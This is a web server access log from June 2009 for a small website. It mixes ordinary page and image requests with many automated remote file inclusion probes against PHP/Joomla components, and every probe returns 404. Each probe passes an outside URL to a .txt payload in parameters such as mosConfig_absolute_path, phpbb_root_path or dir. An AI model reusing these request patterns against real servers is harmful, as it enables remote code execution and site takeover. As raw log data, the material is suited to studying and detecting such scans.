74.6.22.163 - - [12/Jun/2009:02:56:37 -0700] "GET /clipart/buttons/blank/ HTTP/1.0" 200 719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:02:57:14 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:02:57:36 -0700] "GET /logs/access_070812.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:14:28 -0700] "GET /logs/access_071212.log//components/com_smf/smf.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:40:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:40:23 -0700] "GET /logs/access_070912.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:40:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:40:36 -0700] "GET /logs/access_071012.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:40:59 -0700] "GET / HTTP/1.1" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:40:59 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:40:59 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:00 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:01 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:01 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:01 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:01 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:14 -0700] "GET /sitebuilder/images/navbar-2-mouseOver-65578.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:15 -0700] "GET /contactus.html HTTP/1.1" 200 13215 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:16 -0700] "GET /sitebuilder/images/navbar-0-inactive-65062.png HTTP/1.1" 200 250 "http://www.projectpr.com/contactus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:16 -0700] "GET /sitebuilder/images/navbar-2-active-65531.png HTTP/1.1" 200 303 "http://www.projectpr.com/contactus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:44 -0700] "GET /sitebuilder/images/navbar-1-mouseOver-65421.png HTTP/1.1" 200 273 "http://www.projectpr.com/contactus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:44 -0700] "GET /aboutus.html HTTP/1.1" 200 8070 "http://www.projectpr.com/contactus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:45 -0700] "GET /sitebuilder/images/navbar-1-active-65375.png HTTP/1.1" 200 273 "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
146.101.163.36 - - [12/Jun/2009:03:41:45 -0700] "GET /sitebuilder/images/navbar-1-active-65375.png HTTP/1.1" 200 273 "http://www.projectpr.com/aboutus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:48:59 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:03:49:06 -0700] "GET /logs/access_070812.log/components/com_forum/download.php?phpbb_root_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:03:49:09 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [12/Jun/2009:03:49:12 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [12/Jun/2009:03:49:56 -0700] "GET /logs/access_071012.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:03:55:50 -0700] "GET /logs/access_071112.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:03:55:50 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:03:55:50 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:03:58:36 -0700] "GET /components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:03:58:36 -0700] "GET /logs/components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:03:58:36 -0700] "GET /components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:03:58:36 -0700] "GET /logs/access_070812.log%20%20/components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:03:58:39 -0700] "GET /logs/access_070812.log%20%20/components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:03:58:41 -0700] "GET /logs/components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:04:03:56 -0700] "GET /logs/access_071212.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.waxzone.net//components/com_virtuemart/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:04:07:58 -0700] "GET /logs/access_070812.log/components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:04:08:06 -0700] "GET /logs/access_070812.log/components/com_forum/viewonline.php?phpbb_root_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
174.143.3.188 - - [12/Jun/2009:04:11:52 -0700] "GET /logs/access_071012.log/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
174.143.3.188 - - [12/Jun/2009:04:11:52 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
174.143.3.188 - - [12/Jun/2009:04:11:55 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
174.143.3.188 - - [12/Jun/2009:04:13:59 -0700] "GET /logs/access_070912.log/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
174.143.3.188 - - [12/Jun/2009:04:17:34 -0700] "GET /logs/access_071012.log%20/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:30 -0700] "GET /modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:31 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:33 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:34 -0700] "GET /modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:39 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:39 -0700] "GET /modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:23:39 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:03 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:43 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:43 -0700] "GET /modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:44 -0700] "GET /modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:46 -0700] "GET /logs/access_071212.log%20%20//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:47 -0700] "GET /logs/access_071212.log%20%20//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:24:47 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:25:04 -0700] "GET /modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:25:04 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:25:04 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:04:25:29 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
41.189.2.105 - - [12/Jun/2009:04:27:11 -0700] "GET /logs/access_070912.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search?p=allinurl%3A++mobile+com-extcalendar&fr=yfp-t-203&toggle=1&cop=mss&ei=UTF-8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.projectpr.com"
202.190.70.69 - - [12/Jun/2009:04:29:05 -0700] "GET /logs/access_070912.log//errors.php?error=http://kideup.com/images/mysiteslo5_51.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.projectpr.com"
202.190.70.69 - - [12/Jun/2009:04:29:05 -0700] "GET /errors.php?error=http://kideup.com/images/mysiteslo5_51.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.projectpr.com"
202.190.70.69 - - [12/Jun/2009:04:29:06 -0700] "GET /logs//errors.php?error=http://kideup.com/images/mysiteslo5_51.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.projectpr.com"
41.189.2.105 - - [12/Jun/2009:04:30:12 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:30:27 -0700] "GET /logs/access_071212.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:30:28 -0700] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
41.189.2.105 - - [12/Jun/2009:04:30:36 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.projectpr.com"
202.190.70.69 - - [12/Jun/2009:04:32:17 -0700] "GET /logs/access_071012.log//errors.php?error=http://kideup.com/images/mysiteslo5_51.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.projectpr.com"
41.189.2.105 - - [12/Jun/2009:04:35:55 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:36:11 -0700] "GET /logs/access_071012.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:36:18 -0700] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:36:23 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
41.189.2.105 - - [12/Jun/2009:04:38:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:39:56 -0700] "GET /logs/access_070912.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:40:24 -0700] "GET /logs/access_070912.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:40:30 -0700] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:40:30 -0700] "GET /logs//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:41:40 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:41:40 -0700] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:41:40 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:41:45 -0700] "GET /logs/access_071212.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:42:32 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:42:32 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:42:32 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.119.154.129 - - [12/Jun/2009:04:43:12 -0700] "GET /logs/access_070812.log//administrator/components/com_extcalendar/errors.php?error=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.119.154.129 - - [12/Jun/2009:04:43:12 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.119.154.129 - - [12/Jun/2009:04:43:12 -0700] "GET /logs//administrator/components/com_extcalendar/errors.php?error=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.119.154.129 - - [12/Jun/2009:04:44:20 -0700] "GET /logs/access_071212.log//administrator/components/com_extcalendar/errors.php?error=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.169.210.130 - - [12/Jun/2009:04:45:36 -0700] "GET /logs/access_071012.log//errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:45:58 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.119.154.129 - - [12/Jun/2009:04:46:00 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:46:02 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.119.154.129 - - [12/Jun/2009:04:46:09 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:50:24 -0700] "GET /logs/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:50:24 -0700] "GET /logs/access_070812.log/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:50:41 -0700] "GET /logs/access_071212.log/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
80.23.181.2 - - [12/Jun/2009:04:52:27 -0700] "GET /logs/access_070812.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:52:58 -0700] "GET /logs/access_070812.log%20%20/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.53.70.114 - - [12/Jun/2009:04:53:05 -0700] "GET /logs/access_071212.log%20%20/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.203.180.144 - - [12/Jun/2009:04:55:46 -0700] "GET /skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.203.180.144 - - [12/Jun/2009:04:55:46 -0700] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.203.180.144 - - [12/Jun/2009:04:55:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.214.37.11 - - [12/Jun/2009:05:28:39 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.214.37.11 - - [12/Jun/2009:05:28:39 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
